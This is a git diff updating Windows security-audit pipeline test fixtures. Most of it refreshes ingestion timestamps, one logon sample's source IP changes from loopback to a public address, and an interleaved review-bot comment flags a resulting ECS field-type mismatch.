--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4749.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4749.json-expected.json @@ -63,7 +63,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:40.260503600Z", + "ingested": "2021-12-09T13:49:24.244081200Z", "code": "4749", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4750.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4750.json-expected.json index b4c5ecd7781..b477cb2947e 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4750.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4750.json-expected.json @@ -63,7 +63,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:40.407747300Z", + "ingested": "2021-12-09T13:49:24.483829100Z", "code": "4750", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4751.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4751.json-expected.json index 4ee3c8c8932..ecb37b97843 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4751.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4751.json-expected.json @@ -64,7 +64,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:40.552835500Z", + "ingested": "2021-12-09T13:49:24.727114100Z", "code": "4751", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", 
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4752.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4752.json-expected.json index 35bc0a222e4..90de6a84a95 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4752.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4752.json-expected.json @@ -64,7 +64,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:40.705450400Z", + "ingested": "2021-12-09T13:49:25.031682700Z", "code": "4752", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4753.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4753.json-expected.json index 07cd4d8a8fe..b27ceb6bdd7 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4753.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4753.json-expected.json @@ -61,7 +61,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:40.875381200Z", + "ingested": "2021-12-09T13:49:25.348788400Z", "code": "4753", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4759.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4759.json-expected.json index cb7bb05558d..40bcc2ccb38 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4759.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4759.json-expected.json 
@@ -63,7 +63,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:41.022353700Z", + "ingested": "2021-12-09T13:49:25.584313500Z", "code": "4759", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4760.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4760.json-expected.json index b6cef3908dc..bac0357a6d5 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4760.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4760.json-expected.json @@ -63,7 +63,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:41.163968Z", + "ingested": "2021-12-09T13:49:25.827742800Z", "code": "4760", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4761.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4761.json-expected.json index 830f175c950..7621713a598 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4761.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4761.json-expected.json @@ -64,7 +64,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:41.310809800Z", + "ingested": "2021-12-09T13:49:26.083510200Z", "code": "4761", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4762.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4762.json-expected.json index 18217f95c92..4d76b9f7e09 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4762.json-expected.json 
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4762.json-expected.json @@ -64,7 +64,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:41.465874200Z", + "ingested": "2021-12-09T13:49:26.396143700Z", "code": "4762", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4763.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4763.json-expected.json index f25dfa4ea58..cb52d9e625c 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4763.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4763.json-expected.json @@ -61,7 +61,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:41.624591400Z", + "ingested": "2021-12-09T13:49:26.696546700Z", "code": "4763", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4817-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4817-windowssrv2016.json-expected.json index d584f109a61..c6cdaa5b703 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4817-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4817-windowssrv2016.json-expected.json @@ -65,7 +65,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:41.755705200Z", + "ingested": "2021-12-09T13:49:26.934347800Z", "code": "4817", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", 
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4902-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4902-windowssrv2016.json-expected.json index 8f0a5b63070..2ecf8543a3d 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4902-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4902-windowssrv2016.json-expected.json @@ -47,7 +47,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:41.908411200Z", + "ingested": "2021-12-09T13:49:27.170161Z", "code": "4902", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4904-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4904-windowssrv2016.json-expected.json index 32a52f27117..17330065c39 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4904-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4904-windowssrv2016.json-expected.json @@ -65,7 +65,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:42.012244400Z", + "ingested": "2021-12-09T13:49:27.330318200Z", "code": "4904", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4905-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4905-windowssrv2016.json-expected.json index d04eae63429..15487ba6959 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4905-windowssrv2016.json-expected.json 
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4905-windowssrv2016.json-expected.json @@ -65,7 +65,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:42.151342300Z", + "ingested": "2021-12-09T13:49:27.587226700Z", "code": "4905", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4906-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4906-windowssrv2016.json-expected.json index ec5895acb58..b6f2b5af795 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4906-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4906-windowssrv2016.json-expected.json @@ -46,7 +46,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:42.279872Z", + "ingested": "2021-12-09T13:49:27.825407300Z", "code": "4906", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4907-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4907-windowssrv2016.json-expected.json index 1ae33913f9b..4168d754b87 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4907-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4907-windowssrv2016.json-expected.json @@ -68,7 +68,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:42.389168900Z", + "ingested": "2021-12-09T13:49:27.985693600Z", "code": "4907", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", 
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json index df01b643952..c5598dcd88c 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json @@ -67,7 +67,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:42.527294Z", + "ingested": "2021-12-09T13:49:28.241198500Z", "code": "4673", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json index 3c0fa33b09e..b642bbc77e9 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json @@ -67,7 +67,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:42.667343400Z", + "ingested": "2021-12-09T13:49:28.487503600Z", "code": "4697", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json index 4edc9d5ee98..12b89d56426 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json 
@@ -77,7 +77,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-06-14T13:22:42.801490800Z",
+ "ingested": "2021-12-09T13:49:28.747988200Z",
 "code": "4768",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json
index b33a5b6a8a7..ddb7c263c3c 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json
@@ -76,7 +76,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-06-14T13:22:42.955334100Z",
+ "ingested": "2021-12-09T13:49:29.009644600Z",
 "code": "4769",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json
index 52da86a8fa9..d7d7e222ed9 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json
@@ -71,7 +71,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.117413100Z",
+ "ingested": "2021-12-09T13:49:29.273298400Z",
 "code": "4770",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json
index e6144295776..01fdc4730b2 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json
@@ -73,7 +73,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.258335800Z",
+ "ingested": "2021-12-09T13:49:29.523881300Z",
 "code": "4771",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json
index c0e78f9f60b..c792754bfde 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json
@@ -59,7 +59,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.398664300Z",
+ "ingested": "2021-12-09T13:49:29.762661300Z",
 "code": "4776",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json
index 7fd5b55b679..2902fa99439 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json
@@ -66,7 +66,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.530747Z",
+ "ingested": "2021-12-09T13:49:29.967352100Z",
 "code": "4778",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json
index 25d761201a5..7017706a35b 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json
@@ -66,7 +66,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.660341700Z",
+ "ingested": "2021-12-09T13:49:30.189615100Z",
 "code": "4779",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012r2-logon.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012r2-logon.json
index 1dae9ccfc3f..fcb53a5535a 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012r2-logon.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012r2-logon.json
@@ -177,7 +177,7 @@
 "TargetDomainName": "VAGRANT-2012-R2",
 "LogonType": "2",
 "AuthenticationPackageName": "Negotiate",
- "IpAddress": "127.0.0.1",
+ "IpAddress": "89.160.20.156",
 "IpPort": "0",
 "SubjectLogonId": "0x3e7",
 "TargetLogonId": "0x1008e",
@@ -622,7 +622,7 @@
 "AuthenticationPackageName": "NTLM",
 "TargetUserSid": "S-1-5-21-3541430928-2051711210-1391384369-1001",
 "LogonProcessName": "NtLmSsp ",
- "WorkstationName": "127.0.0.1",
+ "WorkstationName": "89.160.20.156",
 "ProcessName": "-",
 "LogonType": "3",
 "TransmittedServices": "-",
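Review bot: In the second hunk of test-security-windows2012r2-logon.json (`@@ -622`), `WorkstationName` is changed from the loopback address to the public IP literal `"89.160.20.156"`, and the regenerated expected output later in this diff shows that value landing in `"source": { "domain": "89.160.20.156" }` with no `source.ip` set for that NTLM network logon. This means the fixture now pins an IP address inside an ECS domain field, so detections or enrichments keyed on `source.ip` would presumably not see this logon at all. If the intent is to exercise a public source address, the cleaner fixture is a hostname in `WorkstationName` (e.g. `"WorkstationName": "WORKSTATION-01",` as a constructed sample) and the IP in the event's `IpAddress` field; if the intent is to cover the "IP-valued WorkstationName" case that real 4624 events do produce, the pipeline should be taught to route an IP-shaped `WorkstationName` to `source.ip`, and the expected file would then change accordingly. Either way, a short comment in the changelog entry or the fixture's README noting which case this record is meant to cover would keep the next regeneration from silently locking in the ECS type mismatch.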
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json
index b417070594d..67bd3fc0fc3 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json
@@ -79,7 +79,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.793881800Z",
+ "ingested": "2021-12-09T13:49:30.420386900Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -177,7 +177,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.793893400Z",
+ "ingested": "2021-12-09T13:49:30.420391200Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -261,7 +261,7 @@
 },
 "source": {
 "port": 0,
- "ip": "127.0.0.1",
+ "ip": "89.160.20.156",
 "domain": "VAGRANT-2012-R2"
 },
 "@timestamp": "2019-03-29T21:10:40.380Z",
@@ -274,14 +274,14 @@
 "VAGRANT-2012-R2$"
 ],
 "ip": [
- "127.0.0.1"
+ "89.160.20.156"
 ]
 },
 "host": {
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.793901500Z",
+ "ingested": "2021-12-09T13:49:30.420397800Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -379,7 +379,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.793909300Z",
+ "ingested": "2021-12-09T13:49:30.420402600Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -476,7 +476,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.793917100Z",
+ "ingested": "2021-12-09T13:49:30.420406900Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -573,7 +573,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.793921300Z",
+ "ingested": "2021-12-09T13:49:30.420412Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -670,7 +670,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.793928800Z",
+ "ingested": "2021-12-09T13:49:30.420418Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -767,7 +767,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.793934300Z",
+ "ingested": "2021-12-09T13:49:30.420423200Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -852,7 +852,7 @@
 }
 },
 "source": {
- "domain": "127.0.0.1"
+ "domain": "89.160.20.156"
 },
 "@timestamp": "2019-03-29T21:13:17.302Z",
 "ecs": {
@@ -867,7 +867,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.793940400Z",
+ "ingested": "2021-12-09T13:49:30.420427200Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -965,7 +965,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.793949300Z",
+ "ingested": "2021-12-09T13:49:30.420431900Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -1069,7 +1069,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.793956Z",
+ "ingested": "2021-12-09T13:49:30.420436200Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -1167,7 +1167,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.793962600Z",
+ "ingested": "2021-12-09T13:49:30.420441700Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -1265,7 +1265,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.793967800Z",
+ "ingested": "2021-12-09T13:49:30.420446300Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -1363,7 +1363,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.794002200Z",
+ "ingested": "2021-12-09T13:49:30.420450800Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -1461,7 +1461,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.794023Z",
+ "ingested": "2021-12-09T13:49:30.420454400Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -1559,7 +1559,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.794028Z",
+ "ingested": "2021-12-09T13:49:30.420459800Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -1657,7 +1657,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.794035300Z",
+ "ingested": "2021-12-09T13:49:30.420465300Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -1764,7 +1764,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-06-14T13:22:43.794039900Z",
+ "ingested": "2021-12-09T13:49:30.420469500Z",
 "code": "4625",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json
index 9cb6b1e6558..822e84517ed 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json
@@ -62,7 +62,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-06-14T13:22:46.770962900Z",
+ "ingested": "2021-12-09T13:49:35.154219200Z",
 "code": "4722",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -144,7 +144,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-06-14T13:22:46.770972100Z",
+ "ingested": "2021-12-09T13:49:35.154227600Z",
 "code": "4722",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json
index 58c4d4dc03a..7e108203131 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json
@@ -62,7 +62,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-06-14T13:22:47.047175900Z",
+ "ingested": "2021-12-09T13:49:35.537944700Z",
 "code": "4723",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -144,7 +144,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-06-14T13:22:47.047193200Z",
+ "ingested": "2021-12-09T13:49:35.537953700Z",
 "code": "4723",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json
index f2ae4a0af07..942bd24df8b 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json
@@ -62,7 +62,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-06-14T13:22:47.311426300Z",
+ "ingested": "2021-12-09T13:49:35.985269800Z",
 "code": "4724",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -144,7 +144,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-06-14T13:22:47.311438100Z",
+ "ingested": "2021-12-09T13:49:35.985278Z",
 "code": "4724",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json
index 7f70f72469b..2e4881719b2 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json
@@ -62,7 +62,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-06-14T13:22:47.610952900Z",
+ "ingested": "2021-12-09T13:49:36.413361600Z",
 "code": "4725",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -144,7 +144,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-06-14T13:22:47.610968200Z",
+ "ingested": "2021-12-09T13:49:36.413370100Z",
 "code": "4725",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json
index 7d4f6275fc1..be08e2e8a84 100644
